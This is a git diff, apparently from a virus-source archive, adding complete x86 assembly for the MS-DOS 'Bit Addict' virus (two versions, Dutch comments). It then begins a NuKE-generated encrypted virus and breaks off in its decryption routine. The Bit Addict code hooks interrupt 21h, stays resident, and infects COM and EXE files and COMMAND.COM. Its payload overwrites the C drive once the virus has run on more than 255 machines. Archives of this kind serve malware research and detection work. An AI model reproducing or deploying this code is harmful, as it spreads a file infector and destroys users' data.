clc + jmp short @@24 +@@22: mov ax,ds + sub ax,cx + cmp ax,-21h + jne @@20 + mov cx,ds + cld + movsw + movsw + clc + jmp short @@24 +@@23: stc +@@24: pop es + pop di + ret + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + mov es,cx + xor si,si + xor di,di + mov cx,VirusSize + cld + rep movsb + xor ax,ax ; leid interrupt 21h om naar + mov ds,ax ; Bit Addict + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 ; is dit de laatste variabele ? + jne @@30 + jmp short @@33 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter, + cmp byte ptr ds:[di+9],':' ; maar doe dit alleen wanneer + jne @@32 ; de comspec naar de c of de + mov al,ds:[di+8] ; d-drive wijst. + and al,0dfh + cmp al,'C' + je @@32 + cmp al,'D' + jne @@33 +@@32: lea dx,[di+8] + push cs:OldIP ; bewaar alle variabelen die + push cs:OldCS ; we nog nodig hebben. + push cs:OldSP + push cs:OldSS + call Infect ; infecteren + pop cs:OldSS ; herstel alle variabelen die + pop cs:OldSP ; we nog nodig hebben + pop cs:OldCS + pop cs:OldIP +@@33: ret + +RestoreBuffers: ; wanneer er niet genoeg + mov ax,cx ; buffers zijn, zet dan de +@@40: cmp ax,dx ; buffers weer terug in de + je @@42 ; keten, anders zal het + mov ds,ax ; systeem hangen. + add ax,21h + mov word ptr ds:[0],0 + mov word ptr ds:[2],ax + jmp short @@40 +@@42: mov ds,dx + mov ax,es:[di] + mov ds:[0],ax + mov word ptr es:[di],0 + mov ax,es:[di+2] + mov ds:[2],ax + mov es:[di+2],cx + ret + +DebugOn:push ax ; deze procedere is om de + push ds ; trap-flag te zetten, en + xor ax,ax ; interrupt 1 te initialiseren + mov ds,ax + cli + mov ax,ds:[4h] + mov word ptr cs:OldInt1[0],ax + mov ax,ds:[6h] + mov word ptr cs:OldInt1[2],ax + mov word ptr ds:[4],offset NewInt1 + mov word ptr ds:[6],cs + mov ax,ds:[84h] + mov word ptr cs:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr cs:OldInt21[2],ax + mov word ptr cs:DosInt21[0],0 + mov word ptr cs:DosInt21[2],0 + pushf + pop ax + or ah,1 + push ax + popf + sti + pop ds + pop ax + ret + +DebugOff: ; deze procedure zet de + push ax ; trap-flag weer op nul en + push ds ; herstelt interrupt 1. + cli + pushf + pop ax + and ah,0feh + push ax + popf + xor ax,ax + mov ds,ax + mov ax,word ptr cs:OldInt1[0] + mov ds:[4],ax + mov ax,word ptr cs:OldInt1[2] + mov ds:[6],ax + sti + pop ds + pop ax + ret + +Init: push cs + pop ds + cmp OldSignature,5a4dh + je @@50 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,Dead-ComHeader+2 + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp short @@51 +@@50: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@51: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@52 + mov ds,ax + mov ax,word ptr ds:ID ; vergelijk identificatie + cmp ax,word ptr cs:ID + je @@52 + stc +@@52: ret + +BiosCheck: ; deze procedure vergelijkt + mov ax,0ffffh ; de bios, met de gegevens + mov ds,ax ; over de bios in het virus, + push cs ; zijn deze niet gelijk, dan + pop es ; zal het virus op een andere + xor si,si ; computer draaien, en wordt + mov di,offset Bios ; er een teller verhoogt, komt + mov cx,10h ; deze teller boven de 255 dan + cld ; zal het bit-addict virus + repe cmpsb ; actief worden. + je @@54 + mov ax,cs:Count + inc ax + cmp ax,100h + jb @@53 + call BitAddict +@@53: mov cs:Count,ax + xor si,si + mov di,offset Bios + mov cx,10h + rep movsb +@@54: ret + +BitAddict: ; in deze procedure wordt + xor dx,dx ; de c-drive overscreven met +@@55: push dx ; onzin, dit mag verandert + mov ax,3 ; worden, om het virus iets + xor bx,bx ; anders te laten doen, een + mov cx,40h ; muziekje spelen, of met het + int 26h ; toetsenbord spelen + pop ax ; bijvoorbeeld. + pop dx + add dx,40h + or dx,dx + jne @@55 + ret + +NewInt1:push bp ; deze procedure wordt + mov bp,sp ; gebruikt bij het debuggen + push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + jnz @@60 + cmp word ptr ss:[bp+4],300h + jae @@61 + mov ax,ss:[bp+2] + mov word ptr cs:DosInt21[0],ax + mov ax,ss:[bp+4] + mov word ptr cs:DosInt21[2],ax +@@60: and word ptr ss:[bp+6],0feffh +@@61: pop ax + pop bp + iret + +DOS: push ax ; roept interrupt 21h aan. + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + pop ax + jnz @@62 + pushf + call cs:OldInt21 + ret +@@62: pushf + call cs:DosInt21 + ret + +Functions: ; dit is een tabel met alle + dfn 3ch,Open ; dos-functies die door + dfn 3dh,Open ; bit-addict verandert worden + dfn 3eh,Close + dfn 3fh,Read + dfn 40h,Write + dfn 4bh,Exec + +NewInt21: ; Het nieuwe interrupt 21h + pushf + push bx + push bp + mov bp,sp + mov bx,offset Functions +@@63: cmp ah,cs:[bx] + je @@68 + add bx,3 + cmp bx,offset NewInt21 + jne @@63 + pop bp + pop bx +EOI: popf + jmp cs:OldInt21 +@@68: mov bx,cs:[bx+1] + xchg bx,ss:[bp+2] + pop bp + ret + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +Exec: cmp al,40h + je InstallCheck + call CheckExtension ; functie 4bh, infecteer eerst + jc EOI ; met Bit Addict + popf + push dx + push ds + pushf + call cs:OldInt21 + pop ds + pop dx + pushf + call Infect + popf + retf 2 + +Open: call CheckExtension ; fn 3ch en 3dh + jc EOI + call cs:OldInt21 + jc @@92 + pushf + push ax + push cx + push si + push di + push es + push cs + pop es + mov si,dx + mov di,offset File1 + cmp word ptr es:[di],0 + je @@90 + mov di,offset File2 + cmp word ptr es:[di],0 + jne @@91 +@@90: cld + stosw + mov cx,70 + rep movsb +@@91: pop es + pop di + pop si + pop cx + pop ax + popf +@@92: retf 2 + +Close: cmp bx,cs:File1 ; fn 3eh + je @@93 + cmp bx,cs:File2 + jne EOI + call cs:OldInt21 + push si + mov si,offset File2 + jmp short @@94 +@@93: call cs:OldInt21 + push si + mov si,offset File1 +@@94: jc @@95 + pushf + push dx + push ds + push cs + pop ds + lea dx,[si+2] + call Infect + pop ds + pop dx + popf +@@95: mov word ptr cs:[si],0 + pop si + retf 2 + +Read: jmp EOI ; fn 3fh + +Write: jmp EOI ; fn 40h + +CheckExtension: ; controleer of de extensie + push ax ; wel exe of com is + push cx + push si + push di + push es + push ds + pop es + mov di,dx ; zoek het einde van de + xor al,al ; file-naam + mov cx,70 + cld + repne scasb + jne @@65 + std + mov al,'.' ; zoek de laatste punt + neg cx + add cx,70 + std + repne scasb + jne @@65 + lea si,[di+2] + cld + lodsw ; eerste 2 letters + and ax,0dfdfh ; maak hoofdletters + cmp ax,5845h ; 'EX' + je @@64 + cmp ax,4f43h ; 'CO' + jne @@65 + lodsb ; 3e letter + and al,0dfh + cmp al,4dh ; 'M' + je @@66 + jmp short @@65 +@@64: lodsb ; 3e letter + and al,0dfh + cmp al,45h ; 'E' + je @@66 +@@65: stc + jmp short @@67 +@@66: clc +@@67: pop es + pop di + pop si + pop cx + pop ax + ret + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst, en is om + add ax,0100h ; het virus te starten. +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf +Dead equ $ + dw 0DEADh ; signature, om te controleren + ; of een file al eens eerder + ; besmet is. + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + call DOS ; ze + jmpc @@83 + push cx + push dx + push ds + test cx,1 + jz @@71 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + call DOS + jmpc @@82 +@@71: mov ax,3d02h ; open de file + call DOS + jmpc @@82 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + call DOS ; bewaar ze + jmpc @@81 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + mov dx,offset Header + call DOS + jmpc @@80 + cmp ax,HeaderLength + jne @@75 + cmp Signature,5a4dh ; Controleer of ID aanwezig is + jne @@72 + cmp ExeID,0DEADh + jmp @@73 +@@72: cmp ComID,0DEADh +@@73: jmpe @@80 ; als ID aanwezig is, stop dan +@@74: cmp Signature,5a4dh + je @@77 +@@75: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + call DOS + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@76 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop ax + jmpc @@80 + inc ax +@@76: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,Dead-ComHeader+2 + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize ; programma + xor dx,dx + call DOS + jmpc @@80 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + call DOS + jmpc @@80 + mov ah,40h ; overschrijf het begin van het + mov cx,Dead-ComHeader+2 ; programma met de com-header + mov dx,offset ComHeader + call DOS + jmp @@80 +@@77: mov di,offset SavedCode ; infecteer exe-files + mov ax,5a4dh ; bewaar de oude waarden van + stosw ; cs:ip en ss:sp + mov ax,ExeIP + stosw + mov ax,ExeCS + stosw + mov ax,ExeSP + stosw + mov ax,ExeSS + stosw + mov ax,PartPage + stosw + mov ax,PageCount + stosw + mov ExeID,0DEADh ; Zet ID in exe-header + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + mov cx,10h + div cx + or dx,dx + je @@78 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop dx + pop ax + jc @@80 + inc ax +@@78: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,VirusSizePara + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+VirusSizePara-CodeSizePara + jae @@79 + mov ax,20h +@@79: mov MinMem,ax + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize ; de exe-file + xor dx,dx + call DOS + jc @@80 + mov ax,4202h ; Pas de file-lengte in de + xor cx,cx ; header aan, als de file veel + xor dx,dx ; overlays bevat, dan zal de + call DOS ; exe-file niet meer werken, + mov cx,200h ; maar de file kan wel hersteld + div cx ; worden. + cmp dx,1 + cmc + adc ax,0 + mov PageCount,ax + mov PartPage,dx + mov ax,4200h + xor cx,cx + xor dx,dx ; ga naar het begin van de file + call DOS + jc @@80 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. + mov dx,offset Header + call DOS +@@80: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + call DOS +@@81: mov ah,3eh ; sluit de file + call DOS +@@82: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@83 + mov ax,4301h + call DOS +@@83: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeEnd equ $ + +Header dw HeaderLength/2 dup(0) +ComCS equ Header[OldSize-Comheader] ; Com file +ComID equ Header[Dead-ComHeader] + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ExeID equ Header[12h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] + +DosInt21 dd 0 +OldInt21 dd 0 +OldInt1 dd 0 + +File1 dw 36 dup(0) +File2 dw 36 dup(0) + +VirusEnd equ $ + +cseg ends + +sseg segment stack + db 200h dup(1) +sseg ends + +end Begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.addict9.asm b/MSDOS/Virus.MSDOS.Unknown.addict9.asm new file mode 100644 index 00000000..9e711f60 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.addict9.asm @@ -0,0 +1,743 @@ +; Bit Addict Versie 9 + +;----------------------------------------------------------------------------- +;----- ----- +;----- Macros en andere hulpmiddellen ----- +;----- ----- +;----------------------------------------------------------------------------- + +; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter +; wordt dan 128 bytes en er dus een foutmelding komt + +dfn macro Num1,Num2 + db Num1 + dw offset Num2 + endm + +jmpc macro Dest ; vervanging voor jc + local @@00 + + jnc @@00 + jmp Dest +@@00: + endm + +jmpnc macro Dest ; vervanging voor jnc + local @@00 + + jc @@00 + jmp Dest +@@00: + endm + +jmpe macro Dest ; vervanging voor je + local @@00 + + jnz @@00 + jmp Dest +@@00: + endm + +jmpne macro Dest ; vervanging voor jne + local @@00 + + jz @@00 + jmp Dest +@@00: + endm + +eseg segment + mov ax,4c00h ; exit + int 21h +eseg ends + +;----------------------------------------------------------------------------- +;----- ----- +;----- Begin van het Bit Addict virus ----- +;----- ----- +;----------------------------------------------------------------------------- + +cseg segment + assume cs:cseg,ds:cseg,es:cseg + org 0 + +BeginCode equ $ ; begin van het virus + +CodeSize equ CodeEnd-BeginCode ; de grootte van het +CodeSizePara equ (CodeEnd-BeginCode+0fh) / 10h ; virus achter een file + +VirusSize equ VirusEnd-BeginCode ; de grootte van het +VirusSizePara equ (VirusEnd-BeginCode+0fh) / 10h ; virus in het geheugen + +HeaderLength equ 18h ; grootte van een + +SavedCode equ this byte ; gegevens over het +OldSignature dw 5a4dh ; programma voor het +OldCSIP equ this dword ; virus +OldIP dw 0 +OldCS dw 0 +OldSP dw 200h +OldSS dw 0 +OldPartPage dw 0 +OldPageCount dw 0 + +Begin: push ax ; Programma om het virus + push ds ; resident te laten blijven + push es ; en om de comspec te + call Init ; infecteren + jnc @@12 + call BiosCheck ; Als bit addict op een andere + push cs ; computer draait wordt er een + pop es ; teller verhoogt. + xor al,al + mov cx,VirusSize-CodeSize ; zet alle variabelen op nul + mov di,CodeSize + cld + rep stosb ; debug interrupt 21h om het + call DebugOn ; orginele interrupt te vinden + pop es + push es + mov ah,4ah ; en reserveer geheugen voor + mov bx,-1 ; bit addict. + call DOS + push bx + call DebugOff + pop bx + mov ax,cs + pop dx + push dx + sub ax,dx + add ax,cs:MinMem + add ax,CodeSizePara+VirusSizePara+1 + cmp bx,ax + jb @@12 + mov ah,4ah + sub bx,VirusSizePara+1 + int 21h + jb @@12 + mov ah,48h + mov bx,VirusSizePara + int 21h + jb @@12 + mov es,ax + dec ax + mov ds,ax + mov word ptr ds:[1],8 + call CopyBitAddict ; Copieer bit addict naar + pop es ; het gereserveerde geheugen + push es ; Infecteer bestand in de + call InfectComspec ; comspec +@@12: pop es + pop ds ; ga nu verder met het + pop ax ; programma voor Bit Addict + cli + mov ss,cs:OldSS + mov sp,cs:OldSP + sti + jmp cs:OldCSIP + + +Comspec db 'COMSPEC=' ; comspec environment variabele + ; om de command.com te vinden + +ID dw 0DEADh ; hier wordt het virus herkend + ; als het in het geheugen staat + +Count dw 0 ; In deze variabele staat op + ; hoeveel verschillende + ; computers het virus is + ; geweest +Bios db 10h dup(0) ; Gegevens over de bios, + ; door dit te vergelijken met + ; de bios kan het virus weten + ; of het virus op een andere + ; computer draait + +CopyBitAddict: + push cs ; copieer Bit Addict naar de + pop ds ; gereserveerde buffers + xor si,si + xor di,di + mov cx,VirusSize + cld + rep movsb + xor ax,ax ; leid interrupt 21h om naar + mov ds,ax ; Bit Addict + mov word ptr ds:[84h],offset NewInt21 + mov word ptr ds:[86h],es + ret + +InfectComspec: + mov es,es:[2ch] ; lees environment segment + xor di,di + push cs ; zoek naar de comspec + pop ds ; variabele + mov si,offset Comspec +@@30: push si + push di + mov cx,8 + cld + repe cmpsb + pop di + pop si + je @@31 + xor al,al + mov cx,-1 + cld + repne scasb + cmp byte ptr es:[di],0 ; is dit de laatste variabele ? + jne @@30 + jmp short @@33 +@@31: push es ; infecteer de COMMAND.COM of + pop ds ; andere command interpreter, + cmp byte ptr ds:[di+9],':' ; maar doe dit alleen wanneer + jne @@32 ; de comspec naar de c of de + mov al,ds:[di+8] ; d-drive wijst. + and al,0dfh + cmp al,'C' + je @@32 + cmp al,'D' + jne @@33 +@@32: lea dx,[di+8] + push cs:OldIP ; bewaar alle variabelen die + push cs:OldCS ; we nog nodig hebben. + push cs:OldSP + push cs:OldSS + call Infect ; infecteren + pop cs:OldSS ; herstel alle variabelen die + pop cs:OldSP ; we nog nodig hebben + pop cs:OldCS + pop cs:OldIP +@@33: ret + +DebugOn:push ax ; deze procedere is om de + push ds ; trap-flag te zetten, en + xor ax,ax ; interrupt 1 te initialiseren + mov ds,ax + cli + mov ax,ds:[4h] + mov word ptr cs:OldInt1[0],ax + mov ax,ds:[6h] + mov word ptr cs:OldInt1[2],ax + mov word ptr ds:[4],offset NewInt1 + mov word ptr ds:[6],cs + mov ax,ds:[84h] + mov word ptr cs:OldInt21[0],ax + mov ax,ds:[86h] + mov word ptr cs:OldInt21[2],ax + mov word ptr cs:DosInt21[0],0 + mov word ptr cs:DosInt21[2],0 + pushf + pop ax + or ah,1 + push ax + popf + sti + pop ds + pop ax + ret + +DebugOff: ; deze procedure zet de + push ax ; trap-flag weer op nul en + push ds ; herstelt interrupt 1. + cli + pushf + pop ax + and ah,0feh + push ax + popf + xor ax,ax + mov ds,ax + mov ax,word ptr cs:OldInt1[0] + mov ds:[4],ax + mov ax,word ptr cs:OldInt1[2] + mov ds:[6],ax + sti + pop ds + pop ax + ret + +Init: push cs + pop ds + cmp OldSignature,5a4dh + je @@50 + mov si,offset SavedCode ; herstel begin van het + mov di,100h ; com-programma + mov cx,Dead-ComHeader+2 + cld + rep movsb + mov OldSS,ss ; bewaar de waarden van + mov OldSP,sp ; ss,sp,cs en ip + sub OldSP,10h + mov OldCS,es + mov OldIP,100h + jmp short @@51 +@@50: mov ax,es ; bereken de waarden van + add ax,10h ; ss,sp,cs en ip + add OldCS,ax + add OldSS,ax +@@51: mov ax,4b40h ; controleer of Bit Addict al + int 21h ; in het geheugen aanwezig is + jc @@52 + mov ds,ax + mov ax,word ptr ds:ID ; vergelijk identificatie + cmp ax,word ptr cs:ID + je @@52 + stc +@@52: ret + +BiosCheck: ; deze procedure vergelijkt + mov ax,0ffffh ; de bios, met de gegevens + mov ds,ax ; over de bios in het virus, + push cs ; zijn deze niet gelijk, dan + pop es ; zal het virus op een andere + xor si,si ; computer draaien, en wordt + mov di,offset Bios ; er een teller verhoogt, komt + mov cx,10h ; deze teller boven de 255 dan + cld ; zal het bit-addict virus + repe cmpsb ; actief worden. + je @@54 + mov ax,cs:Count + inc ax + cmp ax,100h + jb @@53 + call BitAddict +@@53: mov cs:Count,ax + xor si,si + mov di,offset Bios + mov cx,10h + rep movsb +@@54: ret + +BitAddict: ; in deze procedure wordt + xor dx,dx ; de c-drive overscreven met +@@55: push dx ; onzin, dit mag verandert + mov ax,3 ; worden, om het virus iets + xor bx,bx ; anders te laten doen, een + mov cx,40h ; muziekje spelen, of met het + int 26h ; toetsenbord spelen + pop ax ; bijvoorbeeld. + pop dx + add dx,40h + or dx,dx + jne @@55 + ret + +NewInt1:push bp ; deze procedure wordt + mov bp,sp ; gebruikt bij het debuggen + push ax + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + jnz @@60 + cmp word ptr ss:[bp+4],300h + jae @@61 + mov ax,ss:[bp+2] + mov word ptr cs:DosInt21[0],ax + mov ax,ss:[bp+4] + mov word ptr cs:DosInt21[2],ax +@@60: and word ptr ss:[bp+6],0feffh +@@61: pop ax + pop bp + iret + +DOS: push ax ; roept interrupt 21h aan. + mov ax,word ptr cs:DosInt21[0] + or ax,word ptr cs:DosInt21[2] + pop ax + jnz @@62 + pushf + call cs:OldInt21 + ret +@@62: pushf + call cs:DosInt21 + ret + +Functions: ; dit is een tabel met alle + dfn 3ch,Open ; dos-functies die door + dfn 3dh,Open ; bit-addict verandert worden + dfn 3eh,Close + dfn 3fh,Read + dfn 40h,Write + dfn 4bh,Exec + +NewInt21: ; Het nieuwe interrupt 21h + pushf + push bx + push bp + mov bp,sp + mov bx,offset Functions +@@63: cmp ah,cs:[bx] + je @@68 + add bx,3 + cmp bx,offset NewInt21 + jne @@63 + pop bp + pop bx +EOI: popf + jmp cs:OldInt21 +@@68: mov bx,cs:[bx+1] + xchg bx,ss:[bp+2] + pop bp + ret + +InstallCheck: ; Zo kan bit addict weten + mov ax,cs ; dat er al een andere copy + popf ; aanwezig is + clc + retf 2 + +Exec: cmp al,40h + je InstallCheck + call CheckExtension ; functie 4bh, infecteer eerst + jc EOI ; met Bit Addict + popf + push dx + push ds + pushf + call cs:OldInt21 + pop ds + pop dx + pushf + call Infect + popf + retf 2 + +Open: call CheckExtension ; fn 3ch en 3dh + jc EOI + call cs:OldInt21 + jc @@92 + pushf + push ax + push cx + push si + push di + push es + push cs + pop es + mov si,dx + mov di,offset File1 + cmp word ptr es:[di],0 + je @@90 + mov di,offset File2 + cmp word ptr es:[di],0 + jne @@91 +@@90: cld + stosw + mov cx,70 + rep movsb +@@91: pop es + pop di + pop si + pop cx + pop ax + popf +@@92: retf 2 + +Close: cmp bx,cs:File1 ; fn 3eh + je @@93 + cmp bx,cs:File2 + jne EOI + call cs:OldInt21 + push si + mov si,offset File2 + jmp short @@94 +@@93: call cs:OldInt21 + push si + mov si,offset File1 +@@94: jc @@95 + pushf + push dx + push ds + push cs + pop ds + lea dx,[si+2] + call Infect + pop ds + pop dx + popf +@@95: mov word ptr cs:[si],0 + pop si + retf 2 + +Read: jmp EOI ; fn 3fh + +Write: jmp EOI ; fn 40h + +CheckExtension: ; controleer of de extensie + push ax ; wel exe of com is + push cx + push si + push di + push es + push ds + pop es + mov di,dx ; zoek het einde van de + xor al,al ; file-naam + mov cx,70 + cld + repne scasb + jne @@65 + std + mov al,'.' ; zoek de laatste punt + neg cx + add cx,70 + std + repne scasb + jne @@65 + lea si,[di+2] + cld + lodsw ; eerste 2 letters + and ax,0dfdfh ; maak hoofdletters + cmp ax,5845h ; 'EX' + je @@64 + cmp ax,4f43h ; 'CO' + jne @@65 + lodsb ; 3e letter + and al,0dfh + cmp al,4dh ; 'M' + je @@66 + jmp short @@65 +@@64: lodsb ; 3e letter + and al,0dfh + cmp al,45h ; 'E' + je @@66 +@@65: stc + jmp short @@67 +@@66: clc +@@67: pop es + pop di + pop si + pop cx + pop ax + ret + +ComHeader: ; dit stukje wordt voor een + mov ax,cs ; COM-file geplaatst, en is om + add ax,0100h ; het virus te starten. +OldSize equ this word-2 + push ax + mov ax,offset Begin + push ax + retf +Dead equ $ + dw 0DEADh ; signature, om te controleren + ; of een file al eens eerder + ; besmet is. + +Infect: push ax ; Infecteer een file + push bx + push cx + push si + push di + push bp + push es + mov ax,4300h ; lees attributen en bewaar + call DOS ; ze + jmpc @@83 + push cx + push dx + push ds + test cx,1 + jz @@71 + mov ax,4301h ; set Read-Only attribuut + and cx,0fffeh ; op nul + call DOS + jmpc @@82 +@@71: mov ax,3d02h ; open de file + call DOS + jmpc @@82 + mov bx,ax + mov ax,5700h ; lees de datum en tijd en + call DOS ; bewaar ze + jmpc @@81 + push cx + push dx + push cs ; ds=es=cs + pop ds + push cs + pop es + mov ah,3fh ; lees de header van de file + mov cx,HeaderLength + mov dx,offset Header + call DOS + jmpc @@80 + cmp ax,HeaderLength + jne @@75 + cmp Signature,5a4dh ; Controleer of ID aanwezig is + jne @@72 + cmp ExeID,0DEADh + jmp @@73 +@@72: cmp ComID,0DEADh +@@73: jmpe @@80 ; als ID aanwezig is, stop dan +@@74: cmp Signature,5a4dh + je @@77 +@@75: mov ax,4202h ; infecteer com-files + xor cx,cx ; ga naar het einde van de file + xor dx,dx + call DOS + mov cx,10h ; aanpassen van de com-header + div cx ; aan deze com-file + or dx,dx + je @@76 + push ax + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop ax + jmpc @@80 + inc ax +@@76: add ax,10h + mov OldSize,ax + mov si,offset Header ; bewaar het eerste deel van + mov di,offset SavedCode ; het programma + mov cx,Dead-ComHeader+2 + cld + rep movsb + mov ah,40h ; schrijf het virus achter het + mov cx,CodeSize ; programma + xor dx,dx + call DOS + jmpc @@80 + mov ax,4200h ; ga naar het begin van de file + xor cx,cx + xor dx,dx + call DOS + jmpc @@80 + mov ah,40h ; overschrijf het begin van het + mov cx,Dead-ComHeader+2 ; programma met de com-header + mov dx,offset ComHeader + call DOS + jmp @@80 +@@77: mov di,offset SavedCode ; infecteer exe-files + mov ax,5a4dh ; bewaar de oude waarden van + stosw ; cs:ip en ss:sp + mov ax,ExeIP + stosw + mov ax,ExeCS + stosw + mov ax,ExeSP + stosw + mov ax,ExeSS + stosw + mov ax,PartPage + stosw + mov ax,PageCount + stosw + mov ExeID,0DEADh ; Zet ID in exe-header + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + mov cx,10h + div cx + or dx,dx + je @@78 + push ax + push dx + mov ah,40h + mov cx,10h + sub cx,dx + xor dx,dx + call DOS + pop dx + pop ax + jc @@80 + inc ax +@@78: sub ax,HeaderSize + mov ExeCS,ax + mov ExeIP,offset Begin + add ax,VirusSizePara + mov ExeSS,ax + mov ExeSP,200h + mov ax,MinMem + cmp ax,20h+VirusSizePara-CodeSizePara + jae @@79 + mov ax,20h +@@79: mov MinMem,ax + mov ah,40h ; schrijf het virus achter + mov cx,CodeSize ; de exe-file + xor dx,dx + call DOS + jc @@80 + mov ax,4202h ; Pas de file-lengte in de + xor cx,cx ; header aan, als de file veel + xor dx,dx ; overlays bevat, dan zal de + call DOS ; exe-file niet meer werken, + mov cx,200h ; maar de file kan wel hersteld + div cx ; worden. + cmp dx,1 + cmc + adc ax,0 + mov PageCount,ax + mov PartPage,dx + mov ax,4200h + xor cx,cx + xor dx,dx ; ga naar het begin van de file + call DOS + jc @@80 + mov ah,40h ; schrijf de nieuwe exe-header + mov cx,HeaderLength ; over de oude heen. + mov dx,offset Header + call DOS +@@80: pop dx ; herstel de datum van de file + pop cx + mov ax,5701h + call DOS +@@81: mov ah,3eh ; sluit de file + call DOS +@@82: pop ds ; herstel de attributen van de + pop dx ; file + pop cx + test cx,1 + jz @@83 + mov ax,4301h + call DOS +@@83: pop es ; herstel de waarden van de + pop bp ; registers en keer terug + pop di ; naar het oude interrupt 21 + pop si + pop cx + pop bx + pop ax + ret + +CodeEnd equ $ + +Header dw HeaderLength/2 dup(0) +ComCS equ Header[OldSize-Comheader] ; Com file +ComID equ Header[Dead-ComHeader] + +Signature equ Header[0h] ; Exe file +PartPage equ Header[2h] +PageCount equ Header[4h] +HeaderSize equ Header[8h] +MinMem equ Header[0ah] +MaxMem equ Header[0ch] +ExeSS equ Header[0eh] +ExeSP equ Header[10h] +ExeID equ Header[12h] +ExeIP equ Header[14h] +ExeCS equ Header[16h] + +DosInt21 dd 0 +OldInt21 dd 0 +OldInt1 dd 0 + +File1 dw 36 dup(0) +File2 dw 36 dup(0) + +VirusEnd equ $ + +cseg ends + +sseg segment stack + db 200h dup(1) +sseg ends + +end Begin +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.adrian.asm b/MSDOS/Virus.MSDOS.Unknown.adrian.asm new file mode 100644 index 00000000..8ee02f74 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.adrian.asm @@ -0,0 +1,474 @@ +;Ŀ +; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR +; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ +; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR +; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ +; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR +; + +.286 +code segment +assume cs:code,ds:code +org 100h + +start: CALL NEXT + +NEXT: + mov di,sp ;take the stack pointer location + mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus + sub bp,offset next ;subtract the large code off this code + ; +;******************************************************************* +; #1 DECRYPT ROUTINE +;******************************************************************* + +cmp byte ptr cs:[crypt],0b9h ;is the first runnig? +je crypt2 ;yes! not decrypt +;---------------------------------------------------------- +mov cx,offset fin ;cx = large of virus +lea di,[offset crypt]+ bp ;di = first byte to decrypt +mov dx,1 ;dx = value for decrypt +;---------------------------------------------------------- +deci: ;deci = fuck label! +;---------------------------------------------------------- + +not byte ptr [di] +not byte ptr [di] +inc word ptr [di] +sub word ptr [di],09553h +add word ptr [di],0463h +inc word ptr [di] +add byte ptr [di],0c7h +sub word ptr [di],096b1h +inc word ptr [di] +inc byte ptr [di] +sub word ptr [di],06236h +sub word ptr [di],04fb9h +xor word ptr [di],0eaa0h +xor word ptr [di],02ff5h +inc byte ptr [di] +not byte ptr [di] +inc di +inc di 